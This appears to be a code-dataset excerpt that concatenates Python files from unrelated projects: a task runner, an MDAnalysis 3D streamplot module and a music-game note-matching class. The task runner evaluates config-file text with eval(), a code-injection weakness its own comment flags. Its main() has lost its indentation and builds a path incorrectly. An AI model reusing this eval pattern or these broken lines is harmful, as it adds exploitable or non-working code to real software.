    Expects the keys 'task name' (label for logging), 'task method'
    (resolved to a callable via loadModule) and 'task parameters' (a
    string holding a Python dict literal, expanded as keyword arguments).
    """
    # import pdb; pdb.set_trace()
    print 'run task:', task_conf['task name']
    task_func = loadModule(task_conf['task method'])
    # SECURITY: eval() executes arbitrary expressions from the config
    # file -- only run trusted task configurations.
    task_param = eval(task_conf['task parameters'])
    task_func(**task_param)
def main(argv):
task_conf_name = argv[0]
if os.path.exists(task_conf_name):
task_confs = eval(open(task_conf_name).read())
else:
task_conf_name += '%s%s%s' % (os.path.dirname(__file__), '../conf/', task_conf_name)
if os.path.exists(task_conf_name):
task_confs = eval(open(task_conf_name))
else:
print 'task configuration file does not exist'
sys.exit(3)
for task_conf in task_confs:
run_task(task_conf)
if not conf['debug']:
'clean cache files'
cache_path = tempfile.gettempdir()
file_names = [file_name for file_name in os.listdir(cache_path) if file_name.startswith('rupee.cache')]
for file_name in file_names:
print 'remove file:', cache_path+'/'+file_name
os.remove(cache_path+'/'+file_name)
if __name__ == '__main__':
    # Script entry point: the first CLI argument names the task-config file.
    main(sys.argv[1:])
| XiaoLiuAI/RUPEE | src/python/main.py | Python | gpl-2.0 | 1,335 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
'''
Multicore 3D streamplot Python library for MDAnalysis --- :mod:`MDAnalysis.visualization.streamlines_3D`
=========================================================================================================
:Authors: Tyler Reddy and Matthieu Chavent
:Year: 2014
:Copyright: GNU Public License v3
:Citation: [Chavent2014]_
.. autofunction:: generate_streamlines_3d
'''
from __future__ import division, absolute_import
import six
from six.moves import range
import MDAnalysis
import multiprocessing
import numpy as np
import numpy.testing
import scipy
import scipy.spatial.distance
def determine_container_limits(coordinate_file_path, trajectory_file_path, buffer_value):
    '''A function for the parent process which should take the input trajectory and calculate the limits of the
    container for the system and return these limits.

    Returns (x_min, x_max, y_min, y_max, z_min, z_max), each padded outward
    by buffer_value so particles near the edges are still caught.'''
    universe_object = MDAnalysis.Universe(coordinate_file_path, trajectory_file_path)
    coords = universe_object.select_atoms('all').positions  # every particle in the system
    limits = []
    for axis in range(3):
        axis_values = coords[..., axis]
        limits.append(axis_values.min() - buffer_value)
        limits.append(axis_values.max() + buffer_value)
    return tuple(limits)
def produce_grid(tuple_of_limits, grid_spacing):
    '''Produce a grid for the simulation system based on the tuple of Cartesian Coordinate limits calculated in an
    earlier step.

    tuple_of_limits is (x_min, x_max, y_min, y_max, z_min, z_max); the
    returned object is the np.mgrid covering that box at grid_spacing.'''
    x_min, x_max, y_min, y_max, z_min, z_max = tuple_of_limits
    return np.mgrid[x_min:x_max:grid_spacing,
                    y_min:y_max:grid_spacing,
                    z_min:z_max:grid_spacing]
def split_grid(grid, num_cores):
    '''Take the overall grid for the system and split it into lists of cube vertices that can be distributed to each
    core.

    Returns (list_dictionaries_for_cores, total_cubes, num_sheets,
    delta_array_shape): one cube dictionary per core, the overall cube
    count, the number of x-sheets, and the n-1 shape of the delta arrays.'''
    # unpack the x,y,z mgrid arrays
    x, y, z = grid
    num_z_values = z.shape[-1]
    num_sheets = z.shape[0]
    delta_array_shape = tuple(
        [n - 1 for n in x.shape])  # the final target shape for return delta arrays is n-1 in each dimension

    ordered_list_per_sheet_x_values = []
    for x_sheet in x:  # each x_sheet has the same x value in each element
        array_all_x_values_current_sheet = x_sheet.flatten()
        ordered_list_per_sheet_x_values.append(array_all_x_values_current_sheet)
    ordered_list_per_sheet_y_values = []
    for y_columns in y:
        array_all_y_values_current_sheet = y_columns.flatten()
        ordered_list_per_sheet_y_values.append(array_all_y_values_current_sheet)
    ordered_list_per_sheet_z_values = []
    for z_slices in z:
        array_all_z_values_current_sheet = z_slices.flatten()
        ordered_list_per_sheet_z_values.append(array_all_z_values_current_sheet)

    ordered_list_cartesian_coordinates_per_sheet = []
    for x_sheet_coords, y_sheet_coords, z_sheet_coords in zip(ordered_list_per_sheet_x_values,
                                                              ordered_list_per_sheet_y_values,
                                                              ordered_list_per_sheet_z_values):
        # BUG FIX: zip() is an iterator on Python 3; materialize it so that
        # np.array() below builds a (num_points, 3) numeric array rather
        # than an array of zip objects (which breaks the 2-D slicing later).
        ordered_list_cartesian_coordinates_per_sheet.append(list(zip(x_sheet_coords, y_sheet_coords,
                                                                     z_sheet_coords)))
    array_ordered_cartesian_coords_per_sheet = np.array(ordered_list_cartesian_coordinates_per_sheet)
    #now I'm going to want to build cubes in an ordered fashion, and in such a way that I can track the index /
    # centroid of each cube for domain decomposition / reconstruction and mayavi mlab.flow() input
    #cubes will be formed from N - 1 base sheets combined with subsequent sheets
    current_base_sheet = 0
    dictionary_cubes_centroids_indices = {}
    cube_counter = 0
    while current_base_sheet < num_sheets - 1:
        current_base_sheet_array = array_ordered_cartesian_coords_per_sheet[current_base_sheet]
        current_top_sheet_array = array_ordered_cartesian_coords_per_sheet[
            current_base_sheet + 1]  # the points of the sheet 'to the right' in the grid
        current_index = 0
        while current_index < current_base_sheet_array.shape[0] - num_z_values:
            # iterate through all the indices in each of the sheet arrays (careful to avoid extra
            # points not needed for cubes)
            column_z_level = 0  # start at the bottom of a given 4-point column and work up
            while column_z_level < num_z_values - 1:
                current_list_cube_vertices = []
                first_two_vertices_base_sheet = current_base_sheet_array[current_index:current_index + 2, ...].tolist()
                first_two_vertices_top_sheet = current_top_sheet_array[current_index:current_index + 2, ...].tolist()
                next_two_vertices_base_sheet = current_base_sheet_array[current_index +
                                                                       num_z_values: 2 +
                                                                       num_z_values + current_index, ...].tolist()
                next_two_vertices_top_sheet = current_top_sheet_array[current_index +
                                                                     num_z_values: 2 +
                                                                     num_z_values + current_index, ...].tolist()
                for vertex_set in [
                    first_two_vertices_base_sheet, first_two_vertices_top_sheet,
                    next_two_vertices_base_sheet, next_two_vertices_top_sheet
                ]:
                    current_list_cube_vertices.extend(vertex_set)
                vertex_array = np.array(current_list_cube_vertices)
                assert vertex_array.shape == (8, 3), "vertex_array has incorrect shape"
                cube_centroid = np.average(np.array(current_list_cube_vertices), axis=0)
                dictionary_cubes_centroids_indices[cube_counter] = {
                    'centroid': cube_centroid,
                    'vertex_list': current_list_cube_vertices}
                cube_counter += 1
                current_index += 1
                column_z_level += 1
                if column_z_level == num_z_values - 1:  # the loop will break but I should also increment the
                    # current_index
                    current_index += 1
        current_base_sheet += 1
    total_cubes = len(dictionary_cubes_centroids_indices)

    #produce an array of pseudo cube indices (actually the dictionary keys which are cube numbers in string format):
    pseudo_cube_indices = np.arange(0, total_cubes)
    sublist_of_cube_indices_per_core = np.array_split(pseudo_cube_indices, num_cores)
    #now, the split of pseudoindices seems to work well, and the above sublist_of_cube_indices_per_core is a list of
    # arrays of cube numbers / keys in the original dictionary
    #now I think I'll try to produce a list of dictionaries that each contain their assigned cubes based on the above
    # per core split
    list_dictionaries_for_cores = []
    subdictionary_counter = 0
    for array_cube_indices in sublist_of_cube_indices_per_core:
        current_core_dictionary = {}
        items_to_pop = len(array_cube_indices)
        items_popped = 0
        while items_popped < items_to_pop:
            key, value = dictionary_cubes_centroids_indices.popitem()
            current_core_dictionary.update({key: value})
            items_popped += 1
        list_dictionaries_for_cores.append(current_core_dictionary)
        subdictionary_counter += 1
    return list_dictionaries_for_cores, total_cubes, num_sheets, delta_array_shape
def per_core_work(start_frame_coord_array, end_frame_coord_array, dictionary_cube_data_this_core, MDA_selection,
                  start_frame, end_frame):
    '''The code to perform on a given core given the dictionary of cube data.

    Mutates and returns dictionary_cube_data_this_core: each cube gains the
    indices of the particles it contained in the start frame and the
    dx/dy/dz displacement of their centroid between the two frames.
    '''
    # NOTE(review): the two lists below are never used in this function.
    list_previous_frame_centroids = []
    list_previous_frame_indices = []
    # define some utility functions for trajectory iteration:

    def point_in_cube(array_point_coordinates, list_cube_vertices, cube_centroid):
        '''Determine if an array of coordinates are within a cube.

        Returns the indices (into array_point_coordinates) of the points
        that fall inside the cube.'''
        #the simulation particle point can't be more than half the cube side length away from the cube centroid in
        # any given dimension:
        array_cube_vertices = np.array(list_cube_vertices)
        cube_half_side_length = scipy.spatial.distance.pdist(array_cube_vertices, 'euclidean').min() / 2.0
        array_cube_vertex_distances_from_centroid = scipy.spatial.distance.cdist(array_cube_vertices,
                                                                                 cube_centroid[np.newaxis, :])
        # sanity check: all vertices must be equidistant from the centroid
        np.testing.assert_almost_equal(array_cube_vertex_distances_from_centroid.min(),
                                       array_cube_vertex_distances_from_centroid.max(), decimal=4,
                                       err_msg="not all cube vertex to centroid distances are the same, "
                                               "so not a true cube")
        absolute_delta_coords = np.absolute(np.subtract(array_point_coordinates, cube_centroid))
        absolute_delta_x_coords = absolute_delta_coords[..., 0]
        indices_delta_x_acceptable = np.where(absolute_delta_x_coords <= cube_half_side_length)
        absolute_delta_y_coords = absolute_delta_coords[..., 1]
        indices_delta_y_acceptable = np.where(absolute_delta_y_coords <= cube_half_side_length)
        absolute_delta_z_coords = absolute_delta_coords[..., 2]
        indices_delta_z_acceptable = np.where(absolute_delta_z_coords <= cube_half_side_length)
        # a point is inside the cube only if it is within bounds along all
        # three axes simultaneously:
        intersection_xy_acceptable_arrays = np.intersect1d(indices_delta_x_acceptable[0],
                                                           indices_delta_y_acceptable[0])
        overall_indices_points_in_current_cube = np.intersect1d(intersection_xy_acceptable_arrays,
                                                                indices_delta_z_acceptable[0])
        return overall_indices_points_in_current_cube

    def update_dictionary_point_in_cube_start_frame(array_simulation_particle_coordinates,
                                                    dictionary_cube_data_this_core):
        '''Basically update the cube dictionary objects assigned to this core to contain a new key/value pair
        corresponding to the indices of the relevant particles that fall within a given cube. Also, for a given cube,
        store a key/value pair for the centroid of the particles that fall within the cube.'''
        cube_counter = 0
        for key, cube in six.iteritems(dictionary_cube_data_this_core):
            index_list_in_cube = point_in_cube(array_simulation_particle_coordinates, cube['vertex_list'],
                                               cube['centroid'])
            cube['start_frame_index_list_in_cube'] = index_list_in_cube
            if len(index_list_in_cube) > 0:  # if there's at least one particle in this cube
                centroid_particles_in_cube = np.average(array_simulation_particle_coordinates[index_list_in_cube],
                                                        axis=0)
                cube['centroid_of_particles_first_frame'] = centroid_particles_in_cube
            else:  # empty cube; marked with a sentinel string checked below
                cube['centroid_of_particles_first_frame'] = 'empty'
            cube_counter += 1

    def update_dictionary_end_frame(array_simulation_particle_coordinates, dictionary_cube_data_this_core):
        '''Update the cube dictionary objects again as appropriate for the second and final frame.'''
        cube_counter = 0
        for key, cube in six.iteritems(dictionary_cube_data_this_core):
            # if there were no particles in the cube in the first frame, then set dx,dy,dz each to 0
            if cube['centroid_of_particles_first_frame'] == 'empty':
                cube['dx'] = 0
                cube['dy'] = 0
                cube['dz'] = 0
            else:  # there was at least one particle in the starting cube so we can get dx,dy,dz centroid values
                new_coordinate_array_for_particles_starting_in_this_cube = array_simulation_particle_coordinates[
                    cube['start_frame_index_list_in_cube']]
                new_centroid_for_particles_starting_in_this_cube = np.average(
                    new_coordinate_array_for_particles_starting_in_this_cube, axis=0)
                cube['centroid_of_paticles_final_frame'] = new_centroid_for_particles_starting_in_this_cube
                delta_centroid_array_this_cube = new_centroid_for_particles_starting_in_this_cube - cube[
                    'centroid_of_particles_first_frame']
                cube['dx'] = delta_centroid_array_this_cube[0]
                cube['dy'] = delta_centroid_array_this_cube[1]
                cube['dz'] = delta_centroid_array_this_cube[2]
            cube_counter += 1

    #now that the parent process is dealing with the universe object & grabbing required coordinates, each child
    # process only needs to take the coordinate arrays & perform the operations with its assigned cubes (no more file
    # opening and trajectory iteration on each core--which I'm hoping will substantially reduce the physical memory
    # footprint of my 3D streamplot code)
    update_dictionary_point_in_cube_start_frame(start_frame_coord_array, dictionary_cube_data_this_core)
    update_dictionary_end_frame(end_frame_coord_array, dictionary_cube_data_this_core)
    return dictionary_cube_data_this_core
def produce_coordinate_arrays_single_process(coordinate_file_path, trajectory_file_path, MDA_selection, start_frame,
                                             end_frame):
    '''To reduce memory footprint produce only a single MDA selection and get desired coordinate arrays; can later
    send these coordinate arrays to all child processes rather than having each child process open a trajectory and
    waste memory.

    Returns (start_coords, end_coords): the positions of the selected
    particles at start_frame and at end_frame, respectively.'''
    universe_object = MDAnalysis.Universe(coordinate_file_path, trajectory_file_path)
    relevant_particles = universe_object.select_atoms(MDA_selection)
    # walk the trajectory once, capturing positions at the two frames of
    # interest and stopping as soon as end_frame has been passed
    for timestep in universe_object.trajectory:
        frame = timestep.frame
        if frame > end_frame:
            break
        if frame == start_frame:
            start_frame_relevant_particle_coordinate_array_xyz = relevant_particles.positions
        elif frame == end_frame:
            end_frame_relevant_particle_coordinate_array_xyz = relevant_particles.positions
    # NOTE(review): as in the original, a missing start or end frame raises
    # UnboundLocalError here -- confirm callers always pass valid frames.
    return (start_frame_relevant_particle_coordinate_array_xyz, end_frame_relevant_particle_coordinate_array_xyz)
def generate_streamlines_3d(coordinate_file_path, trajectory_file_path, grid_spacing, MDA_selection, start_frame,
                            end_frame, xmin, xmax, ymin, ymax, zmin, zmax, maximum_delta_magnitude=2.0,
                            num_cores='maximum'):
    '''Produce the x, y and z components of a 3D streamplot data set.

    :Parameters:
    **coordinate_file_path** : str
        Absolute path to the coordinate file
    **trajectory_file_path** : str
        Absolute path to the trajectory file. It will normally be desirable to filter the trajectory with a tool
        such as GROMACS g_filter (see [Chavent2014]_)
    **grid_spacing** : float
        The spacing between grid lines (angstroms)
    **MDA_selection** : str
        MDAnalysis selection string
    **start_frame** : int
        First frame number to parse
    **end_frame** : int
        Last frame number to parse
    **xmin** : float
        Minimum coordinate boundary for x-axis (angstroms)
    **xmax** : float
        Maximum coordinate boundary for x-axis (angstroms)
    **ymin** : float
        Minimum coordinate boundary for y-axis (angstroms)
    **ymax** : float
        Maximum coordinate boundary for y-axis (angstroms)
    **zmin** : float
        Minimum coordinate boundary for z-axis (angstroms)
    **zmax** : float
        Maximum coordinate boundary for z-axis (angstroms)
    **maximum_delta_magnitude** : float
        Absolute value of the largest displacement (in dx,dy, or dz) tolerated for the centroid of a group of
        particles (angstroms; default: 2.0). Values above this displacement will not count in the streamplot (
        treated as excessively large displacements crossing the periodic boundary)
    **num_cores** : int, optional
        The number of cores to use. (Default 'maximum' uses all available cores)
    :Returns:
    **dx_array** : array of floats
        An array object containing the displacements in the x direction
    **dy_array** : array of floats
        An array object containing the displacements in the y direction
    **dz_array** : array of floats
        An array object containing the displacements in the z direction
    :Examples:
    ::
    import np as np
    import MDAnalysis
    import MDAnalysis.visualization.streamlines_3D
    import mayavi, mayavi.mlab
    #assign coordinate system limits and grid spacing:
    x_lower,x_upper = -8.73, 1225.96
    y_lower,y_upper = -12.58, 1224.34
    z_lower,z_upper = -300, 300
    grid_spacing_value = 20
    x1, y1, z1 = MDAnalysis.visualization.streamlines_3D.generate_streamlines_3d('testing.gro',
    'testing_filtered.xtc',xmin=x_lower,xmax=x_upper,ymin=y_lower,ymax=y_upper,zmin=z_lower,zmax=z_upper,
    grid_spacing = grid_spacing_value, MDA_selection = 'name PO4',start_frame=2,end_frame=3,num_cores='maximum')
    x,y,z = np.mgrid[x_lower:x_upper:x1.shape[0]*1j,y_lower:y_upper:y1.shape[1]*1j,z_lower:z_upper:z1.shape[
    2]*1j]
    #plot with mayavi:
    fig = mayavi.mlab.figure(bgcolor=(1.0,1.0,1.0),size=(800,800),fgcolor=(0, 0, 0))
    for z_value in np.arange(z_lower,z_upper,grid_spacing_value):
        st = mayavi.mlab.flow(x,y,z,x1,y1,z1,line_width=1,seedtype='plane',integration_direction='both')
        st.streamline_type = 'tube'
        st.tube_filter.radius = 2
        st.seed.widget.origin = np.array([ x_lower, y_upper, z_value])
        st.seed.widget.point1 = np.array([ x_upper, y_upper, z_value])
        st.seed.widget.point2 = np.array([ x_lower, y_lower, z_value])
        st.seed.widget.resolution = int(x1.shape[0])
        st.seed.widget.enabled = False
    mayavi.mlab.axes(extent = [0,1200,0,1200,-300,300])
    fig.scene.z_plus_view()
    mayavi.mlab.savefig('test_streamplot_3D.png')
    #more compelling examples can be produced for vesicles and other spherical systems
    .. image:: test_streamplot_3D.png
    '''
    # work out the number of cores to use:
    if num_cores == 'maximum':
        num_cores = multiprocessing.cpu_count()  # use all available cores
    else:
        num_cores = num_cores  # use the value specified by the user
        # assert isinstance(num_cores,(int,long)), "The number of specified cores must (of course) be an integer."
    np.seterr(all='warn', over='raise')
    parent_cube_dictionary = {}  # collect all data from child processes here

    # callback invoked on the parent each time a worker finishes its cubes
    def log_result_to_parent(process_dict):
        parent_cube_dictionary.update(process_dict)

    #step 1: produce tuple of cartesian coordinate limits for the first frame
    #tuple_of_limits = determine_container_limits(coordinate_file_path = coordinate_file_path,trajectory_file_path =
    # trajectory_file_path,buffer_value=buffer_value)
    tuple_of_limits = (xmin, xmax, ymin, ymax, zmin, zmax)
    #step 2: produce a suitable grid (will assume that grid size / container size does not vary during simulation--or
    # at least not beyond the buffer limit, such that this grid can be used for all subsequent frames)
    grid = produce_grid(tuple_of_limits=tuple_of_limits, grid_spacing=grid_spacing)
    #step 3: split the grid into a dictionary of cube information that can be sent to each core for processing:
    list_dictionaries_for_cores, total_cubes, num_sheets, delta_array_shape = split_grid(grid=grid, num_cores=num_cores)
    #step 3b: produce required coordinate arrays on a single core to avoid making a universe object on each core:
    start_frame_coord_array, end_frame_coord_array = produce_coordinate_arrays_single_process(coordinate_file_path,
                                                                                              trajectory_file_path,
                                                                                              MDA_selection,
                                                                                              start_frame, end_frame)
    #step 4: per process work using the above grid data split
    pool = multiprocessing.Pool(num_cores)
    for sub_dictionary_of_cube_data in list_dictionaries_for_cores:
        pool.apply_async(per_core_work, args=(
            start_frame_coord_array, end_frame_coord_array, sub_dictionary_of_cube_data, MDA_selection, start_frame,
            end_frame), callback=log_result_to_parent)
    pool.close()
    pool.join()
    #so, at this stage the parent process now has a single dictionary with all the cube objects updated from all
    # available cores
    #the 3D streamplot (i.e, mayavi flow() function) will require separate 3D np arrays for dx,dy,dz
    #the shape of each 3D array will unfortunately have to match the mgrid data structure (bit of a pain): (
    # num_sheets - 1, num_sheets - 1, cubes_per_column)
    # NOTE(review): cubes_per_sheet is computed but never used below.
    cubes_per_sheet = int(float(total_cubes) / float(num_sheets - 1))
    #produce dummy zero arrays for dx,dy,dz of the appropriate shape:
    dx_array = np.zeros(delta_array_shape)
    dy_array = np.zeros(delta_array_shape)
    dz_array = np.zeros(delta_array_shape)
    #now use the parent cube dictionary to correctly substitute in dx,dy,dz values
    current_sheet = 0  # which is also the current row
    y_index_current_sheet = 0  # sub row
    z_index_current_column = 0  # column
    total_cubes_current_sheet = 0
    for cube_number in range(0, total_cubes):
        dx_array[current_sheet, y_index_current_sheet, z_index_current_column] = parent_cube_dictionary[cube_number][
            'dx']
        dy_array[current_sheet, y_index_current_sheet, z_index_current_column] = parent_cube_dictionary[cube_number][
            'dy']
        dz_array[current_sheet, y_index_current_sheet, z_index_current_column] = parent_cube_dictionary[cube_number][
            'dz']
        z_index_current_column += 1
        total_cubes_current_sheet += 1
        if z_index_current_column == delta_array_shape[2]:
            # done building current y-column so iterate y value and reset z
            z_index_current_column = 0
            y_index_current_sheet += 1
            if y_index_current_sheet == delta_array_shape[1]:  # current sheet is complete
                current_sheet += 1
                y_index_current_sheet = 0  # restart for new sheet
                z_index_current_column = 0
                total_cubes_current_sheet = 0
    # now set velocity component values greater than a certain cutoff to 0,
    # because they tend to reflect spurious values (i.e., PBC jumping)
    # NOTE(review): despite the comment above saying "to 0", the code
    # assigns 1.0 -- confirm the intended sentinel value against the 2D
    # streamlines module before changing anything.
    dx_array[abs(dx_array) >= maximum_delta_magnitude] = 1.0
    dy_array[abs(dy_array) >= maximum_delta_magnitude] = 1.0
    dz_array[abs(dz_array) >= maximum_delta_magnitude] = 1.0
    return (dx_array, dy_array, dz_array)
# if __name__ == '__main__': #execute the main control function only if this file is called as a top-level script
#will probably mostly use this for testing on a trajectory
| kain88-de/mdanalysis | package/MDAnalysis/visualization/streamlines_3D.py | Python | gpl-2.0 | 25,088 |
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 23 15:22:48 2011
@author: moritz
"""
__all__ = ["bslip"]
| MMaus/mutils | cmodels/__init__.py | Python | gpl-2.0 | 106 |
# Copyright (C) weslowskij
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import networkx
from Game import myStream, myNote
from mylibs.incDijksra import incDijkstra
from mylibs.myDict import MyDict
from Game.myKey import mykey
from Game.myJumpChordsAndSpeedTols import MyJumpChordsAndSpeedTols
import logging
from Game.myNoteMap import KnownChordPos
logger = logging.getLogger(__name__)
hdlr = logging.FileHandler(__name__ + '.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.NOTSET)
#logger.setLevel(logging.DEBUG)
#prof = hotshot.Profile(__name__ + ".prof")
costonedgedict = {}
chorddetection = myStream.ischordms
class MyLevenshteinChallenge(incDijkstra):
    """Incremental-Dijkstra search that aligns incoming played notes against
    a known score, Levenshtein-style (wrong/extra/missing notes accumulate
    edit costs while the search advances through the known chords).

    NOTE(review): several attributes used by methods below
    (``self.noNextInNoteMappings``, ``self.edges``, ``self.pos``,
    ``self.challengestartchord``) are never initialised in ``__init__`` --
    the assignment ``self.noNextInNoteMappings = []`` is even commented out
    there.  Unless the ``incDijkstra`` base class provides them, those
    methods raise AttributeError; confirm against mylibs.incDijksra.
    """
    def __init__(self):
        super(MyLevenshteinChallenge, self).__init__()
        # Expose self.seen via the module-level costonedgedict so edge costs
        # can be printed on graph knots (see module comment below).
        global costonedgedict
        #if G == None:
        self.G = networkx.MultiDiGraph()  # search/state graph
        self.drawposdict = MyDict()  # layout bookkeeping for drawing
        self.drawposdict.defaultvalue=0
        #else:
        #    self.G= G
        self.innotes = myStream.MyStream()  # played notes received so far
        self.echappei = []
        self.nodes = {}  # EqState() -> cached node (see myadd_node)
        self.NoteMaps = {}  # myrepr() -> KnownChordPos cache (currently disabled)
        self.jumpToStates = MyJumpChordsAndSpeedTols()
        #self.echappe=[]
        #self.noNextInNoteMappings=[]
        self.cut={}  # nodes pruned by the error cutoff
        self.nodefullexpanded = {}
        self.target_not_reached = self.target_not_reached_and_do
        self.errors = [0,0]
        self.challengestartnote = None
        #self.challengestartnote = self.jumpToStates.notes[0]
        self.challengeendnote = None
        self.challengeendchord = None
        self.maxerror = [1,1]  # global error budget
        self.maxerrorAtKnownnote={}  # optional per-known-chord error budgets
        self.targets=[]  # list of (note, chord) goals
        self.speedtol = 0.25  # timing tolerance
        self.donelist = {}  # (note, chord) target -> list of reached nodes
        self.retondone=False
        self.verbosetimming=True
        self.chain=[]
        self.name = None
        # to print values on knots..
        costonedgedict = self.seen
    def challengelen(self):
        """Return the challenge length in score positions (end.pos - start.pos).

        Falls back to the first note of the start/end *chord* when the
        explicit start/end *note* is not set.
        """
        start =self.challengestartnote
        if start is None:
            start = self.challengestartchord.notes[0]
        end = self.challengeendnote
        if end is None:
            end = self.challengeendchord.notes[0]
        return end.pos - start.pos
    # depricated ???
    def knownStream(self):
        """Build a MyStream containing all known chords in the challenge range."""
        start =self.challengestartnote
        if start is None:
            start = self.challengestartchord.notes[0]
        end = self.challengeendnote
        if end is None:
            end = self.challengeendchord.notes[0]
        ret = myStream.MyStream()
        ret = ret.buildAllInChordRange(start,end)
        return ret
    """
    def errorcut(self,r):
        m = r.currentMelodyRating
        v = m.notenextMapping
        logger.debug(str(self.name) + " " + "cutting error " + str(self.seen[r]))
        if self.maxerror is not None:
            #if self.seen[r]- r.rcost > self.maxerror:
            #if self.seen[r] > self.maxerror:
            if self.seen[r][0:2] > self.maxerrorAtKnownnote.get(v.knownChord, self.maxerror)[0:2]:
                # just save Notes between start and endnote
                #if v.knownote.pos >= self.challengestartnote.pos:
                #self.cut[r]=r
                logger.debug(str(self.name) + " " + "..cutted")
                return True
        logger.debug(str(self.name) + " " + "not cutted")
        return False
        pass

    def target_reached(self, r):
        #b = (v.innote.__repr__()) == self.target.__repr__()
        #b = v.innote is self.target
        m = r.currentMelodyRating
        v = m.notenextMapping
        if logger.isEnabledFor(logging.DEBUG) and r.lenlist > 1:
            logger.debug(str(self.name) + " " + "checking targets for " + r.prettyprint())
        # check targets
        if len(self.targets) == 0:
            self.targets =[(self.challengeendnote, self.challengeendchord)]
        #logger.debug(str(self.name) + " and targets" + str(self.targets))
        for tnote, tchord in self.targets:
            logger.debug(str(self.name) + " " + "check " + str(tnote)+ tchord.prettyprint())
            if v.knownChord == tnote or (v.knownChord == tchord and v.chordfull()):
                #logger.info("target "+ str((tnote,tchord)) + "reached " + str( self.seen[r]- r.rcost) + " errors")
                a = self.donelist.get((tnote,tchord),[])
                a.append(r)
                self.donelist[(tnote,tchord)]=a
                if self.retondone == (tnote,tchord):
                    logger.debug(str(self.name) + " " + "target reached: ret and done")
                    return True
        logger.debug(str(self.name) + " " + "target reached")
        return False
        #return v == self.target
    """
    def target_not_reached_and_nothing(self):
        """No-op hook: continue the search without side effects."""
        pass
    def target_not_reached_and_do(self):
        """Hook invoked by the base search when a target was not reached.

        Currently a no-op (see the commented debug print below).
        """
        pass
        #print "check Challenge coding bug"
    def update(self):
        """Run the underlying incremental-Dijkstra update and log statistics."""
        ret = super(MyLevenshteinChallenge,self).update()
        logger.info(str(self.name) + " " + "myLevenshteinChallenge stats")
        logger.info(str(self.name) + " " + "nodes " + str(len(self.nodes)))
        # NOTE(review): self.noNextInNoteMappings is not assigned in __init__
        # (that line is commented out); this only works if the incDijkstra
        # base class defines it -- confirm.
        logger.info(str(self.name) + " " + "noNextInNoteMappings " + str(len(self.noNextInNoteMappings)))
        return ret
    #def createKnownChordPos(self, I, K, parent, newplayedchords=None, good=True, appendKnownChord=True):
    def createKnownChordPos(self, I, K, parent, good=True, appendKnownChord=True):
        """Create a KnownChordPos mapping the incoming note *I* onto the known
        chord *K*, inheriting the good/wrong note history from *parent*.

        *good* selects whether *I* counts as a correctly played chord tone or
        as a wrong note; *appendKnownChord* controls whether the history is
        extended at all.  Returns the new KnownChordPos.

        NOTE(review): when *parent* is None, ``ret.playedChordNotesgood`` /
        ``ret.innotesWrong`` must come from KnownChordPos defaults --
        confirm they exist there, otherwise the loop below raises.
        """
        # create NoteMaps at most once
        ret = KnownChordPos()
        ret.innote = I
        ret.knownChord = K
        if hasattr(K, "myoffset"):
            pass
            #1/0
        if parent is not None:
            #ret.playedChordNotes = list(parent.playedChordNotes)
            ret.innotesWrong = list(parent.innotesWrong)
            ret.playedChordNotesgood = list(parent.playedChordNotesgood)
        else:
            pass
        """
        if K:
            ret.playedChordNotes = [K]
            if good:
                ret.playedChordNotesgood=[K]
            else:
                ret.innotesWrong=[I]
        """
        #self.pos[ret]= ret.drawpos()
        # always append ??
        # Skip appending when K was already recorded as correctly played.
        skip = False
        for note in ret.playedChordNotesgood:
            if note is K:
                skip = True
        if not skip and appendKnownChord:
            if K:
                #logger.debug("appending " + K.prettyprint() + " to " + str(id(ret.playedChordNotes)))
                #ret.playedChordNotes.append(K)
                if good:
                    if len(K.getChordtonesofType(I))>0:
                        ret.knownnote = K.getChordtonesofType(I)[0]
                        ret.playedChordNotesgood.append(ret.knownnote)
                    else:
                        # I is not a chord tone of K after all: count it wrong.
                        ret.knownnote = None
                        ret.innotesWrong.append(I)
                else:
                    ret.innotesWrong.append(I)
        # mess needs to advance In but dont change playedchords..
        #if newplayedchords:
        #    ret.playedChordNotesgood = list(newplayedchords)
        # TODO copy innotesWrong too (Done??)
        #ret.innotesWrong = list()
        #ret2 = self.nodes.get(ret.myrepr())
        # Caching of NoteMaps is currently disabled (dead `if False:` branch).
        if False:
            ret2 = self.NoteMaps.get(ret.myrepr())
            if ret2 is None:
                #self.G.add_node(ret)
                self.NoteMaps[ret.myrepr()] = ret
                #self.pos[ret] = ret.drawpos()
                return ret
            else:
                """
                if justnew:
                    print "justnew Notemaps\n"
                    return None
                """
                return ret2
        return ret
    # more update because of incoming note
    def add_note(self, aNote):
        """Feed one incoming (played) note into the search.

        Abstract-by-convention: subclasses are expected to override this;
        the base implementation only prints a reminder.
        """
        print("overwrite me!")
        pass
        # calculate it
        #self.update()
    # todo rewrite
    def findsolution(self, atarget=None):
        """Replay all received notes through a fresh, uncapped search to find
        a solution for the last registered target.

        Returns a tuple ``(challenge, reached_nodes)``.

